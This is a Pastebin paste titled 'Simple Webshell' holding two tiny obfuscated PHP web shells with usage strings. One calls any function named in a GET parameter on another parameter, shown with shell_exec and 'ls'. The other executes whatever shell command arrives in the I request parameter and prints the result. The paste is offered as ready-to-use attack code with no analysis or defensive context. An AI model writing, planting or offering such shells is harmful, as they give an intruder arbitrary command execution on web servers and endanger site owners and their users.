Advertisement
AZZATSSINS_CYBERSERK

Simple Webshell

Apr 30th, 2016
236
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.16 KB | None | 0 0
  1. Exec: ?1=shell_exec&2=ls
  2. Script:
  3.  
  4. <?=($_=@$_GET[2]).@$_($_GET[1])
  5.  ?>
  6.  
  7. =========================
  8.  
  9.  
  10.  
  11. Exec: ?I=ls
  12. Script:
  13.  
  14. <? print(`{$_REQUEST[I]}`);?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement